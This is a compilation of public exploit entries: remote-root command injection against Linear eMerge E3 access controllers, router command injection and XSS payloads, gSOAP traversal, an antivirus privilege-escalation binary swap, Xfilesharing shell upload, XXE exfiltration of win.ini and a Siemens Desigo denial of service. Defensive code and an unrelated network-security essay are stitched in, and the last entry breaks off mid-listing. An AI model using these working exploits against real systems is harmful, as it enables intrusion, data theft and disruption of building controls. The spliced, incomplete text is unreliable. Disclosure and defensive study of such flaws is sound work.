         var boundary = "-----------------------------9703186584101745941654835853";
         var fileSize = fileData.length;

         var body = "--" + boundary + "\r\n";
         body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
         body += currentdir + "\r\n";
         body += "--" + boundary + "\r\n";
         body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
         body += token + "\r\n";
         body += "--" + boundary + "\r\n";
         body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
         body += "Content-Type: " + ctype + "\r\n\r\n";
         body += fileData + "\r\n\r\n";
         body += "--" + boundary + "\r\n";
         body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
         body += "1" + "\r\n";
         body += "--" + boundary + "\r\n";
         body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
         body += fileName + "\r\n";
         body += "--" + boundary + "\r\n";
         body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
         body += "Upload File" + '\r\n';
         body += "--" + boundary + "--";

         xhr.send(body);
     }

     //Grab SQ token
     var req = new XMLHttpRequest();
     req.onreadystatechange=function() {
         if (req.readyState == 4 && req.status == 200) {
             var htmlPage = req.responseXML; /* fetch html */
             var SQ = htmlPage.getElementsByTagName("input")[0]
             submitFormWithTokenJS(SQ.value);
         }
     }
     req.open("GET", "/fudforum/adm/admuser.php", true);
     req.responseType = "document";
     req.send();

     patience();
  10. # Title: Linear eMerge E3 1.00-06 - Remote Code Execution
      # Author: LiquidWorm
      # Date: 2019-11-13
      # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
      # Software Link: http://linear-solutions.com/nsc_family/e3-series/
      # Affected version: <=2.3.0a
      # Advisory: https://applied-risk.com/resources/ar-2019-005
      # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
      # CVE: CVE-2019-7256

      #!/usr/bin/env python
      #
      # Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
      # Affected version: <=1.00-06
      # via card_scan_decoder.php
      # CVE: CVE-2019-7256
      # Advisory: https://applied-risk.com/resources/ar-2019-005
      # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
      #
      # By Gjoko 'LiquidWorm' Krstic
      #
      #########################################################################
      # lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
      # Do you want me to try and get the web front-end credentials? (y/n) y
      # ID='admin',Password='MakeLoveNotWar!'
      #
      # lighttpd@192.168.1.2:/spider/web/webroot$ id
      # uid=1003(lighttpd) gid=0(root)
      #
      # lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
      # Software Version: 1.00.03
      # Image: nxgcpub-image
      # Built by: jenkins
      #
      # lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
      # Password:
      # uid=0(root) gid=0(root) groups=0(root)
      #
      # lighttpd@192.168.1.2:/spider/web/webroot$ exit
      #
      # [+] Erasing read stage file and exiting...
      # [+] Done. Ba-bye!
      #
      #########################################################################

      import requests
      import time####
      import sys#####
      import os######
      import re######

      piton = os.path.basename(sys.argv[0])

      if len(sys.argv) < 2:
          # ASCII-art banner; its line layout was lost in extraction and only the collapsed text survives
          print '''
          ..... .e$$$$$$$$$$$$$$e. z$$ ^$$$$$$$$$$$$$$$$$. .$$$* J$$$$$$$$$$$$$$$$$$$e .$" .$$$$$$$$$$$$$$$$$$$$$$*- .$ $$$$$$$$$$$$$$$$***$$ .ee" z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*" " -\e$$ 4$$$$. .ze$$$"""" 4 z$$$$$ $$$$$$$$$$$$$$$$$$$$" $$$$$$$$ .$$$$$$$$$$$**$$$$*" z$$" $$ $$$$P*"" J$*$$c $$" $$F .$$$ $$ ^$$ $$ *$$c.z$$$ $$ $$ $P $$$$$$$ 4$F 4$ dP *$$$" $$ '$r .$ J$" $" $ $P 4$ F $$ 4$ 4$% 4$ $$ 4$ d$" $$ $P $$ $$ $$ 4$% $$ $$ $$ d$ $$ $F "3 r=4e=" ... ..rf . ""% $**$*"^""=..^4*=4=^"" ^"""
          '''
          print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
          print '\x20\x20[-] by lqwrm (c) 2019'
          print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
          sys.exit()

      ipaddr = sys.argv[1]

      creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
      if creds.strip() == 'y':
          frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
          requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
          showme = requests.get('http://'+ipaddr+'/test.txt')
          print showme.text

      while True:
          try:
              cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
              execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
              #time.sleep(1);
              readreq = requests.get('http://'+ipaddr+'/test.txt')
              print readreq.text
              if cmd.strip() == 'exit':
                  print "[+] Erasing read stage file and exiting..."
                  requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
                  print "[+] Done. Ba-bye!\n"
                  break
              else:
                  continue
          except Exception:
              break

      sys.exit()
  11. # Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
      # Google Dork: N/A
      # Date: 2019-11-11
      # Exploit Author: Luis Stefan
      # Vendor Homepage: https://www.technicolor.com/
      # Software Link: N/A
      # Version: TC7300.B0 - STFA.51.20
      # Tested on: macOS Mojave and Catalina
      # CVE :

      #!/usr/bin/env python3

      __author__ = "Luis Stefan"
      __license__ = "MIT"
      __version__ = "1.0"
      __email__ = "luis.ss@protonmail.com"
      __description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""

      from enum import IntEnum
      from scapy.all import *
      import codecs, sys, threading, time

      # Define your network interface
      interface = 'en0'
      # Insert your interface card mac address
      mac = 'xx:xx:xx:xx:xx:xx'
      broadcast = 'ff:ff:ff:ff:ff:ff'
      mac_hxd = codecs.decode(mac.replace(':', ''),'hex')

      class Bootp(IntEnum):
          Discover = 1
          Offer = 2
          Request = 3
          Decline = 4
          Ack = 5
          Nak = 6
          Release = 7

      def dhcp_discover():
          disc_pkt = Ether(src=mac, dst=broadcast) / \
                     IP(src='0.0.0.0', dst='255.255.255.255') / \
                     UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
                     DHCP(options=[('message-type', 'discover'), 'end'])
          sendp(disc_pkt, iface=interface)

      def dhcp_request(pkt):
          # scapy names the "your IP address" BOOTP field yiaddr
          yraddr = pkt['BOOTP'].yiaddr
          # gwaddr == Gateway Ip Address
          gwaddr = '192.168.0.1'
          param_req_list = []
          hostname = "<script>alert('XSS triggered')</script>"
          req_pkt = Ether(src=mac, dst=broadcast) / \
                    IP(src='0.0.0.0', dst='255.255.255.255') / \
                    UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
                    DHCP(options=[('message-type', 'request'),
                                  ('server_id', gwaddr),
                                  ('requested_addr', yraddr),
                                  ('hostname', hostname),
                                  'end'])
          sendp(req_pkt, iface=interface)

      def dhcp(pkt):
          print(pkt.display())
          print("#############################################################")
          if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
              dhcp_request(pkt)
          elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
              print("Server Acknowledged")
              sys.exit(0)
          elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
              print("Server Declined")
              sys.exit(0)
          elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
              print("Server Nak")
              sys.exit(0)

      def ver_dhcp():
          print("Verifying DHCP port traffic..")
          sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
          sys.exit(0)

      def main():
          t1 = threading.Thread(target=ver_dhcp, args=())
          t1.daemon = True
          t1.start()
          time.sleep(2)
          dhcp_discover()

      if __name__ == "__main__":
          main()
  12. # Exploit Title: Technicolor TD5130.2 - Remote Command Execution
# Date: 2019-11-12
# Exploit Author: João Teles
# Vendor Homepage: https://www.technicolor.com/
# Version: TD5130v2
# Firmware Version: OI_Fw_V20
# CVE : CVE-2019-18396

---------------------------

POST /mnt_ping.cgi HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOST/mnt_ping.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Cookie: session=COOKIE
Connection: close
Upgrade-Insecure-Requests: 1

isSubmit=1&addrType=3&pingAddr=;ls&send=Send
  13. # Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Riccardo Gasparini
# Vendor Homepage: https://www.fastweb.it/
# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
# Version: 0.00.81
# Tested on: Linux
# CVE : N/A

import requests, json, time, sys

current_milli_time = lambda: int(round(time.time() * 1000))

password = 'XXXXXXXXXXXXXXX'
if password == 'XXXXXXXXXXXXXXX':
    print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
    sys.exit(-1)

#get XSRF-TOKEN
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
    'Referer': 'http://192.168.1.254/tr069',
}
params = ()
response = requests.get('http://192.168.1.254', headers=headers)

#login request and get sessionKey
xsrfToken = response.cookies['XSRF-TOKEN']
cookies = {
    'XSRF-TOKEN': xsrfToken,
}
headers = {
    'Pragma': 'no-cache',
    'X-XSRF-TOKEN': xsrfToken,
    'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
    'Accept': 'application/json, text/plain, */*',
    'Referer': 'http://192.168.1.254/tr069',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    'Cache-Control': 'no-cache',
}
params = (
    ('_', str(current_milli_time())),
    ('cmd', '3'),
    ('nvget', 'login_confirm'),
    ('password', password),
    ('remember_me', '1'),
    ('sessionKey', 'NULL'),
    ('username', 'admin'),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
jsonResponse = json.loads(response.text)
sessionKey = jsonResponse["login_confirm"]["check_session"]

print("Executing command reboot\n")
#some commands as example are shown below in the mount parameter
params = (
    ('_', str(current_milli_time())),
    ('act', 'nvset'),
    ('service', 'usb_remove'),
    #Code execution
    #('mount','&ping -c 10 192.168.1.172&'),
    #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
    ('mount', '&reboot&'),
    ('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(response.text)

#logout
params = (
    ('_', str(current_milli_time())),
    ('cmd', '5'),
    ('nvget', 'login_confirm'),
    ('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(json.dumps(json.loads(response.text), indent=2))
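Both router PoCs above (the TD5130.2 `mnt_ping.cgi` request with `pingAddr=;ls`, and the Fastgate `mount` parameter carrying `&reboot&`) work because a CGI handler splices a request value straight into a shell command line. As an added example that is not part of either post and not the vendors' code, here is how the ping handler should be written on the defensive side: the target is accepted only if it parses as an IP literal or an RFC 1123 hostname, and the command runs as an argv list with no shell, so `;`, `&` and similar characters never reach an interpreter. `validate_ping_target` and `build_ping_argv` are hypothetical names; the form body used below is the one from the TD5130.2 post.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# each label 1-63 characters with no leading or trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


class InvalidTarget(ValueError):
    """Raised when a request value is not a plain IP address or hostname."""


def validate_ping_target(value: str) -> str:
    """Return value unchanged if it is an IP literal or an RFC 1123 hostname.

    Anything else (shell metacharacters such as ';' or '&', whitespace,
    empty strings) is rejected before it can get near a command line.
    """
    if not value or len(value) > 253:
        raise InvalidTarget("empty or over-long target")
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass  # not an IP literal; fall through to hostname syntax
    if _HOSTNAME_RE.match(value):
        return value
    raise InvalidTarget(f"not an IP address or hostname: {value!r}")


def build_ping_argv(form_body: str, count: int = 4) -> list:
    """Turn a form body like the PoC's into a shell-free argv list.

    Whatever parse_qs yields for pingAddr is passed through
    validate_ping_target, so the PoC body 'pingAddr=;ls' raises
    InvalidTarget instead of ever running ls.
    """
    fields = parse_qs(form_body, keep_blank_values=True)
    target = validate_ping_target(fields.get("pingAddr", [""])[0])
    return ["ping", "-c", str(count), target]


def run_ping(form_body: str) -> subprocess.CompletedProcess:
    """Execute the validated command as an argv list; no shell is involved."""
    return subprocess.run(build_ping_argv(form_body),
                          capture_output=True, text=True, check=False)
```

The validation is an allow-list on syntax rather than a deny-list of metacharacters, and the argv form means even a hostname that slipped through would be handed to `ping` as a single argument, never to `/bin/sh`.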
  14. # Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap

POC
---------

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
  15. # Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
# Date: 2019-10-10
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://www.scanguard.com/
# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
# Version: 2020
# Tested on: Windows
# CVE : N/A
# Category: exploit

SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
https://www.scanguard.com

[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe
Hash: 1a63c67a249da0c2e9abd09d35c3c65d

Complete Antivirus & Security Software

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
CVE-2019-18895

[Affected Product Code Base]
ScanGuard Antivirus - latest

[Affected Component]
Permissions on installation directory

[Attack Type]
Local

[Impact Code execution]
true

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.

[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available

[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to privilege escalation via a Trojan horse executable file.

The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group. This can allow low integrity malware the ability to replace ScanGuard executables.

C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F

[Exploit/POC]

#include <stdio.h>
#include <stdlib.h>   /* exit(), system() */
#include <windows.h>

#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP PoC By hyp3rlinx */

BOOL PWNED = FALSE;

/* TRUE if szPath exists and is a regular file rather than a directory */
BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){
    if(!FileExists(DISABLED_TARGET)){
        /* first run: move the real ScanGuard.exe aside */
        rename(TARGET, DISABLED_TARGET);
        printf("[+] ScanGuard Antivirus EoP PoC\n");
        Sleep(300);
        printf("[+] Disabled ScanGuard.exe ...\n");
        Sleep(300);
    }else{
        /* second run: we are already executing from the ScanGuard.exe location */
        PWNED = TRUE;
    }

    char fname[MAX_PATH];
    char newLoc[] = TARGET;
    DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);

    if (size){
        if(!PWNED){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(300);
            CopyFile(fname, newLoc, FALSE);
            printf("[+] Replaced legit ScanGuard...\n");
            Sleep(300);
            printf("[+] Done!\n");
            Sleep(300);
            MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
            Sleep(2000);
            exit(0);
        }else{
            if(FileExists("ScamGuard.lnk")){
                system("DEL /f ScamGuard.lnk");
            }
            printf("[+] ScamGuard PWNED!!!");
            printf("[+] By hyp3rlinx\n");
            system("pause");
        }
    }
    return 0;
}

[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
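The icacls listing in the advisory is exactly what an automated hardening check should be reading. The following Python is an added example, not the advisory author's code: it parses icacls-style output, then flags any ACE that gives a broad principal (Everyone, BUILTIN\Users, Authenticated Users; an assumed list for this example) a right that allows replacing files under Program Files. The sample text is constructed from the five ACE lines quoted above.

```python
import re

# Constructed from the icacls listing quoted in the advisory above; continuation
# ACE lines are indented the way icacls prints them.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F
"""

# Principals that must never hold write rights under Program Files (assumption for this example).
BROAD_PRINCIPALS = {"everyone", r"builtin\users", "authenticated users",
                    r"nt authority\authenticated users"}
# Rights that let a user replace or write files: simple rights (F, M, W) and the
# specific rights icacls shows in parentheses (WD write data, AD append, D delete,
# DC delete child, WDAC write DAC, WO write owner, GA/GW generic all/write).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DC", "WDAC", "WO", "GA", "GW"}

# One ACE: <principal>:<inheritance flags><rights>; on the first line of an entry the
# path precedes it, separated by a single space.
_ACE_RE = re.compile(
    r"(?:^|\s)(?P<principal>(?:[^\\:\s][^\\:]*\\)?[^\\:\s][^\\:]*?):"
    r"(?P<inherit>(?:\((?:OI|CI|IO|NP|I|ID)\))*)"
    r"(?P<rights>\(?[A-Z,]+\)?)\s*$"
)


def parse_icacls(text):
    """Yield (path, principal, inheritance_flags, rights) for each ACE in icacls output."""
    path = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _ACE_RE.search(line)
        if m is None:
            continue  # e.g. "Successfully processed 1 files"
        if not raw[:1].isspace():
            # First line of an entry: everything before the ACE is the (absolute) path.
            path = line[:m.start()].rstrip()
        yield path, m.group("principal"), m.group("inherit"), m.group("rights")


def is_write_capable(rights):
    """True if the rights string grants any right that allows writing or replacing files."""
    tokens = set(rights.strip("()").split(","))
    return bool(tokens & WRITE_RIGHTS)


def find_weak_aces(text, protected_prefixes=("c:\\program files",)):
    """Return [(path, principal, rights)] where a broad principal can write under a protected directory."""
    findings = []
    for path, principal, _inherit, rights in parse_icacls(text):
        if not path.lower().startswith(protected_prefixes):
            continue
        if principal.lower() in BROAD_PRINCIPALS and is_write_capable(rights):
            findings.append((path, principal, rights))
    return findings


if __name__ == "__main__":
    for path, principal, rights in find_weak_aces(SAMPLE_ICACLS):
        print(f"WEAK: {principal} has {rights} on {path}")
```

On a default Windows install the Users group holds only read and execute under Program Files, so any F or M entry for Users or Everyone is a finding; the remediation is to remove those ACEs (for instance with `icacls <dir> /remove:g Everyone`) and let the directory inherit the standard Program Files permissions again.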
  16. # Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

##################### Arbitrary File Upload #####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
  <input type="text" name="sid" value="joe">
  <input type="file" name="file">
  <input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

#################### Local File Inclusion ####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL will fetch the "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server, so the included file must have an html extension, anywhere on the server.

You can even merge LFI with the Arbitrary File Upload vulnerability by uploading an html file, i.e. "upload.html", and changing the "sid" to "../../../../../../tmp", so the file gets uploaded in the tmp directory of the server. Now you can include the file as follows.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script has builtin shortcodes as well, so you can achieve RCE by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
  17. # Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source: https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000

1.1- Poc.xml :

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2.- payload.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;

2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9
  18. # Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version: 6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC00-U, PXC64-U, PXC128-U
#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
#                   With activated web server
#                   All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php

#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#

echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"

if [ "$#" -ne 1 ]; then
    echo -ne "\nUsage: $0 [ipaddr]\n\n"
    exit
fi

IP=$1
TARGET="http://$IP/"
# hex-encoded "dir?dir=../../"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`

echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')

if [ "$status" == "404" ]; then
    echo -ne "\n[*] Exploit successful!\n"
else
    echo -ne "\n[-] Exploit unsuccessful.\n"
    exit
fi
  19. Intranet security operations

Intranet security operations cover a company's internal production network and office network. In a traditional enterprise, the production network generally means the industrial control network, and the office network generally means the company's internal systems (document servers, OA systems, finance, patents, HR and other business systems) together with the employees' office computer network. In an Internet or IT enterprise, the production network generally serves only the outside world (official website, main site, CDN, etc.), the office network is the same as in a traditional enterprise, and the test network is the network used for development and test environments. For an Internet or IT enterprise, isolating these three networks from one another is recommended.

Production network security operations

For the production network, the operational strategy adopted is similar to that of the office intranet, but the business thinking differs. First, the production network is the enterprise's lifeline; as with the office network of a financial institution, the business must not be taken down. So first consider ensuring business availability and business data: a dual-copy system, or multiple systems, is recommended. For discovered vulnerabilities, the priority is to patch the backup node that is not yet serving online; once the patch succeeds, the primary and backup nodes are swapped, and the original primary, now the backup node, is patched. Furthermore, the production network must be the most stable, so only the ports the business needs should be opened externally. Access to the production network from the office network must go through a bastion host so that complete authentication and auditing are achieved.

Office intranet security operations

For the office intranet, a high-defense zone must be established. Key sensitive systems such as AD, DHCP, DNS, OA, email, ERP, CRM, patents, finance, recruiting, legal, investment, documents, IM communication, Wiki, project management and version control must be placed in the high-defense zone. Collect their logs completely, ensure auditing and early-warning monitoring, and focus protection on these systems; they expose only the ports the business requires. The gateway network segment (maintenance network) must have its access permissions configured separately and be logically isolated from the intranet. Ordinary employee hosts must be equipped with a unified HIDS product such as a "Guard" or "Butler" type endpoint agent, and it is best to operate the control nodes of these HIDS products on the intranet.

Test network security operations

In general, imposing strict security policy restrictions on the test network is not recommended, but access rights to and access methods for the test network (via a bastion host) must be strictly limited to achieve whitelist control, and test services must not be connected to the office network or the production network.

Initial focus of security operations

Vulnerability and incident handling

The two items above basically amount to no more than a three-step process: discovery, disposal and improvement.
  20. # Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
# Date: 2019-11-14
# Exploit Author: D.Goedecke
# Vendor Homepage: www.shrew.net
# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe
# Version: 2.2.2
# Tested on: Windows 10 64bit

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
ShrewSoft IKE Daemon    iked     C:\Program Files\ShrewSoft\VPN Client\iked.exe -service     Auto
ShrewSoft IPSEC Daemon  ipsecd   C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service   Auto

C:\Users\user>sc qc iked
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: iked
